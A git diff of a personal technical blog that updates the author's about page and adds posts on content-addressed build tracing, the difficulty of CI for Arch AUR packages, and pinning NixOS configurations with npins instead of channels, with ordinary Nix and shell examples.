diff --git a/content/posts/about.md b/content/posts/about.md index d94e758..862ba16 100644 --- a/content/posts/about.md +++ b/content/posts/about.md @@ -9,20 +9,23 @@ isPage = true +++ Hi! -I'm an undergraduate student in Computer Engineering at the University of -British Columbia. +I'm a final-year undergraduate student in Computer Engineering at the +University of British Columbia. -I have done mechanical design for ThunderBots, a RoboCup Small Size League team -building soccer-playing robots. Prior to this, I was on a 4 person team -participating in Skills Canada Robotics, and in my last year of high school, we -had the opportunity to [go to Nationals in -Halifax](/blog/i-competed-in-skills-canada-robotics), where we achieved first -place for Saskatchewan. +In my spare time, when I am not dreaming of all computers landing on the sun, I +work on [NixOS](https://nixos.org) in various places in the project, and a +whole slew of projects you can find on my GitHub profile. I'm most interested +in compilers, operating systems, and build systems. I am a full stack +developer: I can competently write both SystemVerilog and websites, and most +things in between: programming languages are a dime a dozen and I speak a lot +of them, from Rust to Haskell, C/C++, Python, to Fake Haskell That Compiles to +Bash (Nix). I often cosplay (perhaps too successfully) as a build engineer. -Other than robotics, I am most interested in Rust and embedded systems, -especially the security thereof. +When I *am* dreaming of computers experiencing solar destruction, I like +sewing, going on long walks, and cooking. -To contact me, email `jade` at this domain (jade dot fyi). +To contact me, email `jade` at this domain (jade dot fyi) or ping me [on +fedi](https://hachyderm.io/@leftpaddotpy). 
Jade she/they diff --git a/content/posts/build-systems-ca-tracing.md b/content/posts/build-systems-ca-tracing.md new file mode 100644 index 0000000..769c688 --- /dev/null +++ b/content/posts/build-systems-ca-tracing.md @@ -0,0 +1,249 @@ ++++ +date = "2024-01-27" +draft = false +path = "/blog/build-systems-ca-tracing" +tags = ["build-systems", "nix"] +title = "Build systems: content addressed tracing" ++++ + +An idea I have lying around is something I am going to call "ca-tracing" for +the purposes of this post. The concept is to instrument builds and observe what +they actually did, and record that for future iterations such that excess +dependencies can be ignored if, *even if inputs changed*, the instructions are +the same and the files actually observed by the build are the same. + +# Implementation + +## Assumptions + +This idea assumes a hermetic build system, since we need to know if anything +might have differed from build to build, so we need a complete accounting of +the inputs to the build. It is not necessarily the case that such a hermetic +build system would be Nix-like, however, it is easiest to describe on top of a +Nix-like; first one with build identity, then one that lacks build identity +like Nix. + +This also assumes a content-addressed build system with early cut-off like Nix +with [ca-derivations]. In Nix's case, input-addressed builds are executed, then +renamed to a content-addressed path: if a build with different inputs is +executed once more with the same output, it is recorded as resolving to that +output, and further builds are cut off. + +[ca-derivations]: https://www.tweag.io/blog/2021-12-02-nix-cas-4/ + + + +## Conceptual implementation + +Conceptually, a build is a function: + +> (*inputs*, *instructions*) -> *outputs* + +We wish to narrow *inputs* to *inputsactual*, and save this +information alongside *outputs*. 
In a following build, we can then verify if +*instructions'* matches a previous build (*instructions*) and if so, extract +the values of the same dynamically observed *inputs'actual*, but +relative to *inputs'* and compare them to the values of +*inputsactual* from the previous build. + +Since our build system is hermetic, if this hits cache, it can be assumed to have +identical results, modulo any nondeterminism (which we assume to be +unfortunate but unproblematic, and is there regardless of this technique). + +## Making it concrete + +A build ("derivation" in Nix) in a Nix-like system is a specification of: + +* Inputs (files, other derivations) +* Environment variables +* Command to execute + +The point of ca-tracing is to remove excess inputs, so let's contemplate how to +do that. + +### File names + +The inputs are files named based on `hash(contents)` in Nix, but we don't +know which contents we will actually access. This is a problem, since the file +paths of *inputs* need to remain constant across multiple executions of the +build (the paths for *inputs* must equal the paths for *inputs'*), since the +part of *inputs* that changed may be irrelevant to this build. + +In a system that doesn't look like Nix, the input file paths might be the same +across two builds on account of not containing hashes, so this would not be a +problem. + +We can solve the file names problem by replacing the hash parts in the input +filenames with random values per-run. These hashes should never appear, even in +part, in the output, if the builder is not doing things with them that would +render the build non-deterministic. + +Unfortunately the file names may appear in the output through the ordering of +deterministic hash tables, for instance, which could be a problem; this exists +in practice in ELF hash tables for instance. Realistically we would need +file-type-specific rewriters to fixup execution output to a deterministic +result following multiple runs. 
+ +We would also have to rewrite those hashes within blocks of data read from +within the builder, but that's *possibly* just a few FUSE crimes away to be +able to do live, on-demand. + +Following the build, the temporary hashes of the inputs can be substituted for +their concrete values pointing to the larger inputs †. + + + +### Tracing, filesystem + +To trace a build, one would have to pull the filesystem activity. This is +possible with some BPF tracing constrained to some cgroup on Linux, so that is +not the hard part. + +The data that would have to be known is: + +* Observed directory listings with hashes +* Read file names matching *inputs*, with associated hashes +* Extremely annoyingly: `fstat(2)` results for all queried files in inputs + (this is extremely annoying because everything calls `fstat` all the time + pointlessly or to check for files being present, and it includes things like + the length of a file, which could *in principle* cause unsoundness if not + recorded). + +This would then all be compared to the equivalent paths in *inputs'* and if the +hashes match, the previous build could be immediately used. + +## Avoiding build identity; how would this work in Nix? + +Nix is built on top of an on-disk key-value store (namely, the directory +`/nix/store`), which is a mapping: + +> Hash -> Value + +Thus, we just need to construct a hash in such a way that both Build and Build' +get the same hash value. + +We could achieve this by modifying the derivation in a deterministic manner +such that two modified-derivations share a hash if they could plausibly have +ca-tracing applied. 
Specifically, rewrite the input hashes to something like +the following: + +> hash("ca-tracing" + name + position-in-inputs) + "-" + name + +When a build is invoked, modify the derivation, hash it, and check for the +presence of a record of a modified-derivation of the same hash, and then check +if the actually-used filesystem objects when applied to *inputs'* remain the +same. + +# Use cases + +This idea is almost certainly best suited for builds using the smallest +possible unit of work, both in terms of usefulness and likelihood of bugs in +the rewriting. To use the terminology from [Build Systems à la Carte][bsalc], +it is likely most useful for systems that are closer to constructive traces +than deep constructive traces. + +[bsalc]: https://www.microsoft.com/en-us/research/uploads/prod/2018/03/build-systems.pdf + +For example, if this is applied to individual compiler jobs in a C++ project, +it can eliminate rebuilds from imprecise build system dependency tracking, +whereas if the derivation/unit of work is larger, the rebuild might be +necessary anyway. + +# Problems + +* There could exist multiple instances of a modified-derivation with different + filesystem activity, due to, say, a bunch of rebuilds against very + differently patched inputs. This system would have to be able to either + represent that or just discard old ones. +* Real programs abuse `fstat(2)` way too much and it's very likely that this + whole thing might not actually get any cache hits in practice if `fstat` + calls are considered. Without visibility into processes we cannot know if + `fstat` calls' results are actually used for anything more than checking if a + file exists. + + This might benefit from some limited dynamic tracing inside processes to + determine whether the fstat result is actually read. +* The whole enterprise is predicated on generalized sound rewriting, which is + likely very hard; see below. 
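The placeholder naming scheme from "Avoiding build identity" above can be sketched in a few lines of shell. This is only an illustration under stated assumptions: `placeholder_name` is a hypothetical helper, the `:` separator is an arbitrary choice, and a truncated SHA-256 stands in for whatever hash encoding a real store would use. The point is that the real input hash never enters the computation, so two builds whose inputs differ only in content end up with the same modified-derivation.

```shell
#!/usr/bin/env bash

# Hypothetical helper: compute the placeholder store name for one input.
# Assumption: sha256 truncated to 32 hex characters stands in for a real
# store-path hash; Nix itself uses a different encoding and length.
placeholder_name() {
  local name=$1 position=$2
  local digest
  # Only the constant tag, the input's name, and its position are hashed,
  # never the input's real content hash.
  digest=$(printf 'ca-tracing:%s:%s' "$name" "$position" | sha256sum | cut -c1-32)
  printf '%s-%s\n' "$digest" "$name"
}

# The same (name, position) pair always maps to the same placeholder,
# regardless of which concrete version of the input is being built against.
placeholder_name openssl 0
placeholder_name zlib 1
```

Including the position keeps two inputs that happen to share a name from colliding, at the cost of making the placeholder sensitive to input ordering.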
+ +## Naive rewriting is a bad idea + +The implementation of ca-derivations itself, where it just rewrites hashes +appearing in random binaries with the moral equivalent of `sed`, is extremely +unsound with respect to compression, ordered structures (even NAR files would +fall victim to this), and any other kind of non-literal storage of store paths, +and this approach just adds yet more naive rewriting that is likely to explode +spectacularly at runtime. + +Naively rewriting store paths is an extension of the original idea of Nix doing +runtime dependencies by naively scanning for reference paths. However, +crucially, the latter does not *modify* random binaries without any knowledge +of their contents, and the worst case scenario for that reference scanning is a +runtime error when someone downloads a binary package. + +Realistically, this would have to be done with a "[diffoscope] of rewriters", +which can parse any format and rewrite references in it. We can check soundness of a +build under rewriting by simply running it more times. The rewriter need +not be a trusted component, since its impact is only as far as breaking your +binaries (reproducibly so), which Nix is great at already! + +In an actual implementation, I would even go so far as saying the rewriter +*must not* be part of Nix since it is generally useful, and it is fundamentally +something that would have to move pretty fast and perhaps even have per-project +modifications such that it cannot possibly be in a Nix stability guarantee. + +[diffoscope]: https://diffoscope.org/ + +# Related work + +This is essentially the idea of edef's incomplete project [Ripple], an +arbitrary-program memoizer, among other work, but significantly scaled down to +be less general and possibly more feasible. Compared to her project, this idea +doesn't look into processes at all, and simply involves tracing filesystem +accesses to read-only resources in an already-hermetic build system. 
+ +Thanks to edef for significant feedback and discussion about this post. You can +[sponsor her on GitHub here][edef-gh] if you want to support her work on making +computers more sound such as the Nix content addressed cache project, tvix, and +also her giving these ideas to Arch Linux developers. + +[edef-gh]: https://github.com/sponsors/edef1c + +[Ripple]: https://nlnet.nl/project/Ripple/ + diff --git a/content/posts/flakes-arent-real.md b/content/posts/flakes-arent-real.md index 20648e0..5d0ceb3 100644 --- a/content/posts/flakes-arent-real.md +++ b/content/posts/flakes-arent-real.md @@ -167,11 +167,12 @@ even if the same package name appears in both. Magic ✨ That is, in the following intentionally-flawed-for-other-reasons `flake.nix`: ```nix -{...}: { +{ + # .... outputs = { nixpkgs, ... }: - let pkgs = nixpkgs.legacyPackages.x86_64-linux; - in { - packages.x86_64-linux.x = pkgs.callPackage ./package.nix { }; + let pkgs = nixpkgs.legacyPackages.x86_64-linux; + in { + packages.x86_64-linux.x = pkgs.callPackage ./package.nix { }; }; } ``` @@ -453,6 +454,12 @@ actually invoking `nixpkgs.lib.nixosSystem`. The latter is the much more sinister part, and the reason I would strongly recommend inline modules with closures instead of `specialArgs`: they break flake composition. +That being said, *either* using `specialArgs` *or* an inline module inside +`flake.nix`, rather than an option above, is the only way to inject module +imports. That is, if one uses some option like `imports = [ config.someOption +]`, it will cause an infinite recursion error. We would suggest putting the +imports inside an inline module inside `flake.nix` for this case. 
+ To use `specialArgs`, an attribute set is passed into `nixpkgs.lib.nixosSystem`, which then land in the arguments of NixOS modules: @@ -463,11 +470,11 @@ nixosConfigurations.something = nixpkgs.lib.nixosSystem { specialArgs = { myPkgs = nixpkgs; }; - modules = { - { pkgs, lib, myPkgs }: { + modules = [ + ({ pkgs, lib, myPkgs }: { # do something with myPkgs - } - }; + }) + ]; } ``` diff --git a/content/posts/packaging-is-extremely-hard/antifa-demon-core.png b/content/posts/packaging-is-extremely-hard/antifa-demon-core.png new file mode 100644 index 0000000..ec6c1bd Binary files /dev/null and b/content/posts/packaging-is-extremely-hard/antifa-demon-core.png differ diff --git a/content/posts/packaging-is-extremely-hard/index.md b/content/posts/packaging-is-extremely-hard/index.md new file mode 100644 index 0000000..0a99540 --- /dev/null +++ b/content/posts/packaging-is-extremely-hard/index.md @@ -0,0 +1,256 @@ ++++ +date = "2024-01-27" +draft = true +path = "/blog/packaging-is-extremely-hard" +tags = ["build-systems", "arch-linux", "linux", "nix"] +title = "Packaging is extremely hard, or, why building AUR packages in CI is a nightmare" ++++ + +Packaging on a traditional distribution is challenging to say the least, and I +haven't seen any coherent descriptions of *why* hermetic build systems like Nix +eliminate an entire category of needing to think about certain things. Recently +a friend mentioned she was considering setting up a CI service for some AUR +packages by a trivial cron job, whereas my reaction to the idea of CI for Arch +packages is "that would take a month of work to do correctly". + +Let's explore the inherent complexity in writing a CI service for basically any +binary distro; picking on Arch Linux is only because it is what I have +experience with, though they tend to be especially fast and loose with inherent +complexity. 
One could argue that Arch in particular is the Go of distros, since +it ignores a lot of hard things in order to ship a working distro, similarly to +[how Go famously solves complexity by ignoring it][golang]. This is not about +factionalism; it is about the choices of where distro maintainers have spent +their energy, and ignoring complexity is something that has its place. + +Arch is known for having a large user maintained repository of non-reviewed +community-written packaging for most anything under the sun called the AUR. +This is a blessing and a curse, because Arch is extremely a binary distro. +Pretty much this entire post would apply to anyone maintaining a binary +repository for another distribution, except perhaps the part of building +packages maintained by other people in CI. + +[golang]: https://fasterthanli.me/articles/i-want-off-mr-golangs-wild-ride + +[rebuild-conds]: https://wiki.archlinux.org/title/DeveloperWiki:How_to_be_a_packager#The_workflow +[rebuild-detector]: https://github.com/maximbaz/rebuild-detector + +## "Rebuild conditions are indeterminate", or, why C++ people are always talking about ABI + +If you are a downstream consumer of an official binary package, such as being +an AUR packager, there is not really any obvious notice that you should rebuild +your package due to dependency updates, besides, perhaps, [rebuild-detector] +and upgrading your system regularly. + +The way that release management is done at Arch Linux is that maintainers +updating libraries go and [ping all their colleagues][soname-bump] when their +upstream changed their software so it is no longer binary-compatible +("ABI-compatible"), represented by a "soname bump", e.g. changing the file name +`libc.so.5` -> `libc.so.6`. This is not terribly unusual among distros. 
+ +However, it's perfectly possible that packages break their ABI without updating +their soname, since most changes to C header files besides adding things will +break ABI in theory, for instance, changing `#define` constants or other such +things. So, if upstream is being impolite, they can cause bugs at any time, and +blatant changes can be caught by things like [abi-checker], though they don't +necessarily form part of the official process for Arch. + +[abi-checker]: https://lvc.github.io/abi-compliance-checker/ + +[soname-bump]: https://wiki.archlinux.org/title/DeveloperWiki:How_to_be_a_packager#Run_sogrep_on_identified_soname_change + +When packages are rebuilt without being updated, this is done by incrementing +`pkgrel` in the PKGBUILD, which is achieved automatically in the official repos +with `pkgctl build --rebuild` ([man page][pkgctl-build]) of the affected +packages. For example, for a version `0.20.10-1`, incrementing `pkgrel` would +produce a version `0.20.10-2`, which is uploaded to staging as well as pushed +to the package's own Git repo with `pkgctl release`. + +After all the builds are made, `pkgctl db move` is invoked to move all the +packages over. + + + +[pkgctl-build]: https://man.archlinux.org/man/pkgctl-build.1.en + +### Atomicity? Is that like a criticality incident? + +{% image(name="./antifa-demon-core.png", colocated=true) %} +an antifaschistische aktion sticker with a demon core in the middle, +"ausgerutscht, trotzdem da" on top and "kernphysiker antifa" on the bottom +{% end %} + + + +If the official repos operate by coordination between all the packagers, with a +staging area to atomically release rebuilds, it follows that AUR packagers can +expect that official repos can and will change at any time without notification +(unless one goes and looks at the development bug tracker). 
+ + + +[arch-arm]: https://wiki.archlinux.org/title/Arch_Linux_Archive + +This is a relatively reasonable process for a distro that doesn't fully +automate everything and even one that does, but it is kind of a problem if you +aren't an official maintainer working in the official repos, since you aren't +in the notification list. + +Note also that the information that the AUR itself has on packages is not +sufficient to send emails about this either; this isn't the fault of the +Arch developers. + +However, the upshot of this is that if one is using an AUR package maintained +by someone else, there is no guarantee anyone has tried building it against the +latest versions of the official repos, and it is in fact also impossible to +know what versions it was successfully built against. A local build of an AUR +package can get arbitrarily out of sync with the official repos and it is not +easily possible to reconstruct the state of all the repos that went into +building it. + +Stuff randomly breaking due to repositories using the time of day as a software +version pinning mechanism is not just an AUR problem: it is much, much worse on +third-party binary repositories. For instance, even though [archzfs] is by far +one of the best executed third party repositories, in large part on account of +them running a CI service, it still can be out of time with the versions of the +kernel. + +[archzfs]: https://github.com/archzfs/archzfs + +However, the instance where third party repositories get *really* out of sync +with things is for things like Manjaro which have repositories delayed by two +weeks relative to Arch for "stability". This doesn't work out very well. + +## The source-build-source cycle + +For any package, a CI system that fully automates the packaging workflow needs +to be able to increment `pkgrel` on any dependency updates and trigger a +rebuild automatically. 
This is stored in the package source files: the CI +system has to be able to push to the sources automatically. + +This also means that a CI system building someone else's AUR packages needs to +*fork any packages it builds*, since it must be able to update `pkgrel` based +on its own detection of upstream changes, without worrying about the AUR +maintainer doing it. + +### Building someone else's stuff? Better reconcile it with automated local changes automatically + +However, the even worse corollary of the above is if the other maintainer +*does* update `pkgrel`, since then you have to reconcile your own maintained +`pkgrel` and ensure that it strictly increases even with the maintainer's +changes. + +Another cause of needing to rebuild AUR sourced packages is the AUR package +itself changing, perhaps because upstream updated it and the AUR packager +updated their packaging. In that case, one has to discard local changes and +hope that versions strictly increased so pacman will install the new one. + +## Weightless! In the package manager! Loopy dependency graphs + +Debian ([documentedly so][debian-loopy]) and most other binary distros don't +have any tooling preventing packages forming circular build dependency graphs. +The most trivial one that exists in most any binary distribution is the C++ +compiler, which is itself likely a build dependency of the C++ compiler since +both clang and gcc are written in C++. + +How does one get the first compiler? In most distros, the answer is +"someone built it manually from somewhere and shoved it in /usr/local and then +built the first compiler package using some crimes". However, that path is, for +the most part, not documented or clearly reproducible. It is the typical state +of affairs to have the *distro repository itself* be a ball of inscrutable +mutable state. 
+ +In NixOS it's [a tarball of compilers that's built with Nix and is occasionally +updated][nixos-bootstrap-tools], and will in the future [be rooted in a 256 +byte binary][nixos-minimal-bootstrap] after which everything is built from +source, which is what Guix also does. There's a bunch more information about +the efforts to bootstrap from nearly nothing at [bootstrappable.org], as well +as [on the Guix blog][fsb]. + +[bootstrappable.org]: https://bootstrappable.org/ + +[fsb]: https://guix.gnu.org/en/blog/2023/the-full-source-bootstrap-building-from-source-all-the-way-down/ +[nixos-bootstrap-tools]: https://github.com/nixos/nixpkgs/blob/d0efa70d8114756ca5aeb875b7f3cf6d61543d62/pkgs/stdenv/linux/make-bootstrap-tools.nix#L237-L256 +[nixos-minimal-bootstrap]: https://github.com/nixos/nixpkgs/blob/3dcd819caa03c848a9a06964857e12e4b789239e/pkgs/os-specific/linux/minimal-bootstrap/default.nix + +[debian-loopy]: https://wiki.debian.org/CircularBuildDependencies + +## Package tests? p--package integration t-tests?? + +So you want to write an integration test for your package on Arch Linux. That's +too bad, because there's not a testing framework, because there are not tests. +Packages can run the software's testsuite, but there is no officially supported +integration testing solution. + +# Software engineering fixes this + +I have spilled a thousand words on how traditional binary distros (that [are +not Fedora][fedora-ci]) spend a significant amount of labour doing rebuilds +largely by hand, with scripts on their local machines, coordinating amongst +maintainers. Most packages are built on developer machines, though [never on +Fedora][fedora-ci2] and only [sometimes on Debian][debian-ci], and thus cannot +necessarily be trusted to not be contaminated by the squishy mutable stuff that +happens on dev machines. Even though they are typically built in chroots, the +environment is not controlled. 
+ +[debian-ci]: https://ci.debian.net/ + +I have addressed how packages require manually poking `pkgrel` every time a +rebuild is necessary, and how the need for rebuilds affects downstream +builders. This is, incidentally, [largely still true on +Fedora][fedora-updates]. + +The (pessimistic but sound) way to manage rebuilds is to just recompile every +downstream when a single bit of any dependency changes. This is the approach +used by Nix and it trades a significant but not unaffordably large (for a big +distro) amount of computer time in a build cluster for not having to think +about any of this. ABI breaks cannot affect the distribution because everything +was built against the exact same libraries, together. + +A Nix-like hermetic build system doesn't have a concept of `pkgrel`, because +packages are just what is in the single monorepo source tree on a given commit. +There is nothing wrong with the other approach of multiple repositories and +repository metadata that doesn't expose a single history, but it would be +useful to be able to cleanly ensure that a group of machines have exactly the +same packages on them as of some epoch, say. + +Facebook has made a tool for RPM distributions that builds OS images with +Buck2, called [Antlir]. This takes snapshots of repositories and builds OS +images with a hermetic build system, such that they receive the exact same +result every time. + +[Antlir]: https://facebookincubator.github.io/antlir/docs/ + +ABI breaks can *also* not break downstream consumers of `nixpkgs`, because Nix +builds out-of-tree stuff exactly the same using the same version set as +anything else: unlike every binary distribution, the distribution packages are +not special, and building out-of-tree stuff will never randomly break due to +ABI changes. 
+ +NixOS has a robust and widely used (1040 of them) [integration +test][nixos-integration-tests] system, like Fedora, testing most parts of the +system and [gating repository updates][nixos-gating] like Fedora Bodhi. + +[nixos-gating]: https://status.nixos.org/ +[nixos-integration-tests]: https://nix.dev/tutorials/nixos/integration-testing-using-virtual-machines.html +[fedora-updates]: https://docs.fedoraproject.org/en-US/fesco/Updates_Policy/ +[fedora-ci2]: https://discussion.fedoraproject.org/t/report-from-the-reproducible-builds-hackfest-during-flock-2023/87469 +[fedora-ci]: https://docs.fedoraproject.org/en-US/ci/ diff --git a/content/posts/pinning-nixos-with-npins.md b/content/posts/pinning-nixos-with-npins.md new file mode 100644 index 0000000..82f8537 --- /dev/null +++ b/content/posts/pinning-nixos-with-npins.md @@ -0,0 +1,368 @@ ++++ +date = "2024-05-20" +draft = false +path = "/blog/pinning-nixos-with-npins" +tags = ["nix"] +title = "Pinning NixOS with npins, or how to kill channels forever without flakes" ++++ + +> Start of Meetup: "hmm, Kane is using nixos channels, that's not good, it's going to gaslight you"
+> 6 hours later: Utterly bamboozled by channels
+> 6.5 hours later: I am no longer using channels + +\- [@riking@social.wxcafe.net](https://social.wxcafe.net/@riking/112465844452065776) + +Nix channels, which, just like Nix, is a name overloaded to mean several +things, are an excellent way to confuse and baffle yourself with a NixOS +configuration by making it depend on uncontrolled and confusing external +variables rather than being self-contained. You can see [an excellent +explanation of the overloaded meanings of "channels" at samueldr's +blog][samueldr-channels]. In this post I am using "channels" to refer to the +`nix-channel` command that many people use to manage what `<nixpkgs>` points to, +and thus control system updates. + +[samueldr-channels]: https://samuel.dionne-riel.com/blog/2024/05/07/its-not-flakes-vs-channels.html + +It is a poorly guarded secret in NixOS that `nixos-rebuild` is simply a bad +shell script; you can [read the sources here][nixos-rebuild]. I would even go +so far as to argue that it's a bad shell script that is a primary contributor +to flakes gaining prominence, since its UX on flakes is so much better: flakes +don't have the `/etc/nixos` permissions problems *or* the pains around pinning +that exist in the default non-flakes `nixos-rebuild` experience. We rather owe +it to our users to produce a better build tool, though, because `nixos-rebuild` +is *awful*, and there are currently the beginnings of efforts in that direction +by people including samueldr; `colmena` is also an example of a better build +tool. + +Both the permissions issue and the pinning are extremely solvable problems +though, which is the subject of this post. [Flakes have their +flaws][samueldr-flakes] and, more to the point, plenty of people just don't +want to learn them yet, and nobody has yet met people where they are at with +respect to making this simplification *without* doing it with flakes. + +This is ok! 
Let's use something more understandable that does the pinning part +of flakes and not worry about the other parts. + +[samueldr-flakes]: https://samuel.dionne-riel.com/blog/2023/09/06/flakes-is-an-experiment-that-did-too-much-at-once.html + +This blog post teaches you how to move your NixOS configuration into a repo +wherever you want, and eliminate `nix-channel` altogether, instead pinning the +version of `<nixpkgs>` and NixOS in a file in your repo next to your config. + +[nixos-rebuild]: https://github.com/nixos/nixpkgs/blob/b5c90bbeb36af876501e1f4654713d1e75e6f972/pkgs/os-specific/linux/nixos-rebuild/nixos-rebuild.sh + +# Background: what NixOS builds actually do + +First, let's say how NixOS builds actually work, skipping over all the remote +build stuff that `nixos-rebuild` also does. + +For non-flakes, `<nixpkgs/nixos>` is evaluated; that is, [`nixos/default.nix`][nixos-defaultnix] in +`<nixpkgs>`. This resolves the `NIX_PATH` entry `<nixos-config>` as the first +user-provided NixOS module to evaluate, or alternatively +`/etc/nixos/configuration.nix` if that doesn't exist. For flake configurations, +substitute `yourflake#nixosConfigurations.NAME` in your head in place of +`<nixpkgs/nixos>`. + +[nixos-defaultnix]: https://github.com/nixos/nixpkgs/blob/6510ec5acdd465a016e5671ffa99460ef70e6c25/nixos/default.nix + +The default `NIX_PATH` is the following: + +``` +nix-path = $HOME/.nix-defexpr/channels nixpkgs=/nix/var/nix/profiles/per-user/root/channels/nixpkgs /nix/var/nix/profiles/per-user/root/channels +``` + +That is to say, unless it's been changed, `<nixpkgs>` will reference root's +channels, managed with `nix-channel`. + +Next, the attribute `config.nix.package` of `<nixpkgs/nixos>` is evaluated then +built/downloaded (!!) unless it is a flake config (or `--no-build-nix` or +`--fast` is passed). Then the attribute `config.system.build.nixos-rebuild` is +likewise evaluated and the `nixos-rebuild` is re-executed into the one from the +future configuration instead of the one from the current configuration, unless +`--fast` is passed. 
+ +Once your configuration has been evaluated once or twice pointlessly, it is +evaluated a third time, for the attribute `config.system.build.toplevel`, and +that is built to yield the new system generation. + +This derivation is what becomes `/run/current-system`: it contains a bunch of +symlinks to everything that forms that generation such as the kernel, initrd, +`etc` and `sw` (which is the NixOS equivalent of `/usr`). + +Finally, `the-build-result/bin/switch-to-configuration` is invoked with an +argument `switch`, `dry-activate`, or similar. + +--- + +From this information, one could pretty much write a NixOS build tool: it really is +just `nix build -f '<nixpkgs/nixos>' config.system.build.toplevel` (in old +syntax, `nix-build '<nixpkgs/nixos>' -A config.system.build.toplevel`), then +`result/bin/switch-to-configuration`. That's all it does. + +# Background: what is npins anyway? + +[`npins`][npins] is the spiritual successor to [niv], the venerable Nix pinning +tool many people used before switching to flakes. But what is a pinning tool +for Nix anyway? It's just a tool that finds the latest commit of something, +downloads it, then stores that commit ID and the hash of the code in it in a +machine-readable lock file that you can check in. When evaluating your Nix +expressions, they can use `builtins.fetchTarball` to obtain that exact same +code every time. + +That is to say, a pinning tool lets you avoid having to copy paste Git commit +IDs around, and ultimately does something like this in the end, which hands you +a path in the Nix store with the code at that version. + +```nix +builtins.fetchTarball { + # https://github.com/lix-project/lix/tree/main + url = "https://github.com/lix-project/lix/archive/992c63fc0b485e571714eabe28e956f10e865a89.tar.gz"; + sha256 = "sha256-L1tz9F8JJOrjT0U6tC41aynGcfME3wUubpp32upseJU="; + name = "source"; +}; +``` + +Let's demystify how pinning tools work by writing a trivial one in a couple of +lines of code. 
+ +First, let's find the latest commit of nixos-unstable with `git ls-remote`: + +``` +~ » git ls-remote https://github.com/nixos/nixpkgs nixos-unstable +4a6b83b05df1a8bd7d99095ec4b4d271f2956b64 refs/heads/nixos-unstable +~ » git ls-remote https://github.com/nixos/nixpkgs nixos-unstable | cut -f1 +4a6b83b05df1a8bd7d99095ec4b4d271f2956b64 +``` + +Then we can construct an archive URL for that commit ID, and fetch it into the +Nix store: + +``` +~ » nix-prefetch-url --name source --unpack https://github.com/nixos/nixpkgs/archive/4a6b83b05df1a8bd7d99095ec4b4d271f2956b64.tar.gz +0zmyrxyrq6l2qjiy4fshjvhza6gvjdq1fn82543wb2li21jmpnpq +``` + +And finally fetch it from a Nix expression: + +``` +~ » nix repl +Lix 2.90.0-lixpre20240517-0d2cc81 +Type :? for help. +nix-repl> nixpkgs = builtins.fetchTarball { url = "https://github.com/nixos/nixpkgs/archive/4a6b83b05df1a8bd7d99095ec4b4d271f2956b64.tar.gz"; name = "source"; sha256 = "0zmyrxyrq6l2qjiy4fshjvhza6gvjdq1fn82543wb2li21jmpnpq"; } +nix-repl> nixpkgs +"/nix/store/0aavdx9m5ms1cj5pb1dx0brbrbigy8ij-source" +``` + +This is essentially exactly what npins does, minus the part of saving the +commit ID and hash into `npins/sources.json`. + +We could write a simple shell script to do this, perhaps called +`./bad-npins.sh`: + +```bash +#!/usr/bin/env bash + +name=nixpkgs +repo=https://github.com/nixos/nixpkgs +branch=nixos-unstable + +# same archive URL shape as in the manual steps above +tarballUrl="$repo/archive/$(git ls-remote "$repo" "$branch" | cut -f1).tar.gz" +sha256=$(nix-prefetch-url --name source --unpack "$tarballUrl") + +# initialize sources.json if not present +[[ !
-f sources.json ]] && echo '{}' > sources.json + +# use sponge from moreutils to deal with jq not having the buffering to safely +# do in-place updates +< sources.json jq --arg sha256 "$sha256" --arg url "$tarballUrl" --arg name "$name" \ + '.[$name] = {sha256: $sha256, url: $url}' \ + | sponge sources.json +``` + +and then from Nix we can load the sources: + +```nix +let + srcs = builtins.fromJSON (builtins.readFile ./sources.json); + fetchOne = _name: { sha256, url, ... }: builtins.fetchTarball { + name = "source"; + inherit sha256 url; + }; +in +builtins.mapAttrs fetchOne srcs +``` + +Result: + +``` +~ » nix eval -f sources.nix +{ nixpkgs = "/nix/store/0aavdx9m5ms1cj5pb1dx0brbrbigy8ij-source"; } +``` + +We now have a bad pinning tool! I wouldn't recommend using this shell script, since +it doesn't do things like check if redownloading the tarball is necessary, but +it is certainly cute and it does work. + +`npins` is pretty much this at its core, but well-executed. + +[npins]: https://github.com/andir/npins +[niv]: https://github.com/nmattia/niv + +# Fixing the UX issues + +We know that: + +1. `<nixpkgs>` as seen by `nixos-rebuild` determines what version of nixpkgs + is used to build the configuration. +2. The location of the configuration is simply determined by `<nixos-config>`. +3. Both instances of duplicate configuration evaluation are gated on `--fast` + not being passed. + +So, we just have to invoke `nixos-rebuild` with the right options and +`NIX_PATH` such that we get a config from the current directory with a +`nixpkgs` version determined by `npins`. + +Let's set up npins, then write a simple shell script. + +``` +$ npins init --bare +$ npins add --name nixpkgs channel nixos-unstable +``` + +You can also use `nixos-23.11` (or future versions once they come out) in place +of `nixos-unstable` here, if you want to use a stable nixpkgs. + +Time for a simple shell script.
Note that this shell script uses `nix eval`, +which we at *Lix* are very unlikely to ever break in the future, but it does +require `--extra-experimental-features nix-command` as an argument if you don't +have the experimental feature enabled, or +`nix.settings.experimental-features = "nix-command"` in a NixOS config. (The +experimental feature can be hacked around with +`nix-instantiate --json --eval npins/default.nix -A nixpkgs.outPath | jq -r .`, +which works around `nix-instantiate --eval` missing a `--raw` flag, but this is +kind of pointless since we are about to use flakes features in a second.) + +```bash +#!/usr/bin/env bash + +# run from the directory containing this script, even if the path has spaces +cd "$(dirname "$0")" + +# assume that if there are no args, you want to switch to the configuration +cmd=${1:-switch} +shift + +nixpkgs_pin=$(nix eval --raw -f npins/default.nix nixpkgs) +nix_path="nixpkgs=${nixpkgs_pin}:nixos-config=${PWD}/configuration.nix" + +# without --fast, nixos-rebuild will compile nix and use the compiled nix to +# evaluate the config, wasting several seconds +sudo env NIX_PATH="${nix_path}" nixos-rebuild "$cmd" --fast "$@" +``` + +# Killing channels + +Now that the config builds successfully, we can kill channels to stop their +reign of terror, since we no longer need them to build the configuration at +all. Use `sudo nix-channel --list` and then `sudo nix-channel --remove +CHANNELNAME` on each one. While you're at it, you can also delete `/etc/nixos` +if you've moved your configuration to your home directory. + +Now we have a NixOS configuration built without using channels, but once we are +running that system, `<nixpkgs>` will still refer to a channel (or nothing, if +the channels are deleted), since we didn't do anything to `NIX_PATH` on the +running system. Also, the `nixpkgs` flake reference will point to the latest +`nixos-unstable` at the time of running a command like `nix run nixpkgs#hello`. +Let's fix both of these things.
